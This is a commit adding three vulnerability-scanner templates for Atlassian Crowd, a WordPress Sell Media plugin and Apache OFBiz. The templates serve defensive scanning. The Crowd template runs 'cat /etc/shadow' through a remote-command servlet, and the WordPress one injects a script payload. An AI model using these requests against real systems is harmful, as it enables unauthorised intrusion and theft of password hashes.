Merge pull request #312 from dwisiswant0/tpl/add-cves

ehsandeep · web-flow · commit 7cda82423171 · 2020-08-16T21:29:02.000+05:30
Add CVEs (CVE-2020-9496, CVE-2019-6112 & CVE-2019-11580)
diff --git a/cves/CVE-2019-11580.yaml b/cves/CVE-2019-11580.yaml
@@ -0,0 +1,38 @@
+id: CVE-2019-11580
+
+info:
+  name: Atlassian Crowd & Crowd Data Center - Unauthenticated RCE
+  author: dwisiswant0
+  severity: critical
+
+  # Atlassian Crowd and Crowd Data Center
+  # had the pdkinstall development plugin incorrectly enabled in release builds.
+  # Attackers who can send unauthenticated or authenticated requests
+  # to a Crowd or Crowd Data Center instance can exploit this vulnerability
+  # to install arbitrary plugins, which permits remote code execution on
+  # systems running a vulnerable version of Crowd or Crowd Data Center.
+  # All versions of Crowd from version 2.1.0 before 3.0.5 (the fixed version for 3.0.x),
+  # from version 3.1.0 before 3.1.6 (the fixed version for 3.1.x),
+  # from version 3.2.0 before 3.2.8 (the fixed version for 3.2.x),
+  # from version 3.3.0 before 3.3.5 (the fixed version for 3.3.x),
+  # and from version 3.4.0 before 3.4.4 (the fixed version for 3.4.x) are affected by this vulnerability.
+  # -
+  # References:
+  # > https://github.com/jas502n/CVE-2019-11580
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow"
+      - "{{BaseURL}}:8095/crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "root:*:"
+          - "bin:*:"
+        condition: and
+        part: body
+      - type: status
+        status:
+          - 200
diff --git a/cves/CVE-2019-6112.yaml b/cves/CVE-2019-6112.yaml
@@ -0,0 +1,30 @@
+id: CVE-2019-6112
+
+info:
+  name: WordPress Plugin Sell Media v2.4.1 - Cross-Site Scripting
+  author: dwisiswant0
+  severity: medium
+
+  # A Cross-site scripting (XSS) vulnerability
+  # in /inc/class-search.php in the Sell Media plugin v2.4.1 for WordPress
+  # allows remote attackers to inject arbitrary web script or HTML
+  # via the keyword parameter (aka $search_term or the Search field).
+  # --
+  # References:
+  # > https://github.com/graphpaperpress/Sell-Media/commit/8ac8cebf332e0885863d0a25e16b4b180abedc47#diff-f16fea0a0c8cc36031ec339d02a4fb3b
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/sell-media-search/?keyword=%22%3E%3Cscript%3Ealert%281337%29%3C%2Fscript%3E"
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "id=\"sell-media-search-text\" class=\"sell-media-search-text\""
+          - "alert(1337)"
+        condition: and
+        part: body
+      - type: status
+        status:
+          - 200
diff --git a/cves/CVE-2020-9496.yaml b/cves/CVE-2020-9496.yaml
@@ -0,0 +1,55 @@
+id: CVE-2020-9496
+
+info:
+  name: Apache OFBiz XML-RPC Java Deserialization
+  author: dwisiswant0
+  severity: medium
+
+  # This temaplte detects a Java deserialization vulnerability in Apache
+  # OFBiz's unauthenticated XML-RPC endpoint /webtools/control/xmlrpc for
+  # versions prior to 17.12.04.
+  # --
+  # References:
+  # - https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz
+
+requests:
+  - raw:
+      - |
+        POST /webtools/control/xmlrpc HTTP/1.1
+        Host: {{Hostname}}
+        Origin: http://{{Hostname}}
+        Content-Type: application/xml
+
+        <?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>
+
+      - |
+        POST /webtools/control/xmlrpc HTTP/1.1
+        Host: {{Hostname}}:8080
+        Origin: http://{{Hostname}}:8080
+        Content-Type: application/xml
+
+        <?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>
+
+      - |
+        POST /webtools/control/xmlrpc HTTP/1.1
+        Host: {{Hostname}}:8443
+        Origin: https://{{Hostname}}:8443
+        Content-Type: application/xml
+
+        <?xml version="1.0"?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value>dwisiswant0</value></param></params></methodCall>
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "faultString"
+          - "No such service [ProjectDiscovery]"
+          - "methodResponse"
+        condition: and
+        part: body
+      - type: word
+        words:
+          - "Content-Type: text/xml"
+        part: header
+      - type: status
+        status:
+          - 200
